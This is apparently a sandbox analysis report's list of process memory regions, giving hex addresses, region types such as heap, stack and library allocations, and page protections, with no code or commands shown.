29EAA262000
heap
page read and write
21F27274000
trusted library allocation
page read and write
27E4B0DF000
trusted library allocation
page read and write
21F228FF000
heap
page read and write
7FFD34684000
trusted library allocation
page read and write
29EABE30000
heap
page read and write
21F24350000
trusted library allocation
page read and write
7FFD34766000
trusted library allocation
page execute and read and write
9CAA77A000
stack
page read and write
7FFD34862000
trusted library allocation
page read and write
21F2293A000
heap
page read and write
27E4AF53000
trusted library allocation
page read and write
BD00BFE000
stack
page read and write
2906AE09000
heap
page read and write
DE5B17E000
stack
page read and write
2906AE47000
heap
page read and write
7FFD34831000
trusted library allocation
page read and write
21F22890000
heap
page read and write
27E4A9C0000
trusted library allocation
page read and write
9CAB90E000
stack
page read and write
29EAA4AB000
heap
page read and write
21F24A1A000
trusted library allocation
page read and write
C18603F000
stack
page read and write
2906AE36000
heap
page read and write
21F22914000
heap
page read and write
21F24A74000
trusted library allocation
page read and write
972000
heap
page read and write
27E62FCF000
heap
page read and write
27E4B08B000
trusted library allocation
page read and write
29EAA4A5000
heap
page read and write
29EAA24F000
heap
page read and write
27E493A5000
heap
page read and write
21F22AC0000
heap
page read and write
29EAA263000
heap
page read and write
C1863BC000
stack
page read and write
29EABEC3000
heap
page read and write
5F0000
heap
page read and write
29EAA263000
heap
page read and write
27E4AD22000
trusted library allocation
page read and write
7FFD34950000
trusted library allocation
page read and write
27E4AC6A000
trusted library allocation
page read and write
27E634B0000
heap
page read and write
2B3E000
stack
page read and write
29EAA4A0000
heap
page read and write
27E6306E000
heap
page read and write
2906CB46000
heap
page read and write
989000
heap
page read and write
7FF6F4E70000
unkown
page readonly
27E4AB38000
trusted library allocation
page read and write
7FFD34920000
trusted library allocation
page read and write
21F245F0000
heap
page read and write
2906ADE9000
heap
page read and write
53B000
stack
page read and write
29EAC0C0000
trusted library allocation
page read and write
9CAA67E000
stack
page read and write
29EAA22C000
heap
page read and write
27E4AF3D000
trusted library allocation
page read and write
2906AE07000
heap
page read and write
C1859FE000
stack
page read and write
27E63270000
heap
page read and write
BD00EFE000
stack
page read and write
2906CB56000
heap
page read and write
21F22880000
heap
page read and write
21F28674000
trusted library allocation
page read and write
7FFD347A0000
trusted library allocation
page execute and read and write
C185D7D000
stack
page read and write
2906CB52000
heap
page read and write
2906ADFF000
heap
page read and write
27E4AC54000
trusted library allocation
page read and write
C185FBF000
stack
page read and write
2906AE29000
heap
page read and write
7FFD348E0000
trusted library allocation
page read and write
7FFD34990000
trusted library allocation
page read and write
DE5B0FB000
stack
page read and write
27E49360000
heap
page read and write
29EAA220000
heap
page read and write
5EE000
stack
page read and write
30A9000
trusted library allocation
page read and write
29EAA260000
heap
page read and write
27E63040000
heap
page read and write
AD0000
heap
page read and write
7FF6F4E70000
unkown
page readonly
27E490F2000
heap
page read and write
29EAA243000
heap
page read and write
7FFD34900000
trusted library allocation
page read and write
7FF6F4E71000
unkown
page execute read
21F24460000
heap
page read and write
29EAA263000
heap
page read and write
27E4AB4D000
trusted library allocation
page read and write
21F24A70000
trusted library allocation
page read and write
C185EFF000
stack
page read and write
21F22B30000
heap
page readonly
9CAAB38000
stack
page read and write
9CAAD3F000
stack
page read and write
9FD000
heap
page read and write
7FF6F4E7E000
unkown
page readonly
BD013FF000
stack
page read and write
2906ADF6000
heap
page read and write
7FF6F4E71000
unkown
page execute read
There are 394 hidden memdumps, click here to show them.